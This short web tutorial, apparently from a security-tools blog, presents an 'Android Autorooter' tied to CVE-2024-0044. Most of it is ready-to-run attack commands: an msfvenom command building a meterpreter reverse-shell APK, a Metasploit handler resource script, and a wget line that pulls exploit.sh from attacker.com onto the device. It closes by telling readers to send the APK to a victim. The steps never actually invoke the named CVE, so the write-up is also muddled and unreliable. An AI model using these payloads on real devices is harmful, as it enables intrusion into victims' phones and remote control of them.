“Android Autorooter” delves into the cutting-edge possibilities of exploiting Android vulnerabilities to achieve root access.

This article guides you through setting up a self-executing Android exploit using CVE-2024-0044, a critical security flaw.

Follow step-by-step instructions to craft and deploy a meterpreter payload, turning theoretical vulnerability into practical attack capability.

Give This A Try

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk

Create a resource script execute_script.rc to automate the commands:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc

Create the resource script with the necessary commands:

cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh

Start Metasploit with the resource script:

msfconsole -r execute_script.rc

Get the party started with:

msfconsole -r execute_script.rc

Now your listener/payload delivery is set up… Send that payload.apk to the victim.. Lets get some root baby

Published by Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Leave a comment

Your email address will not be published. Required fields are marked *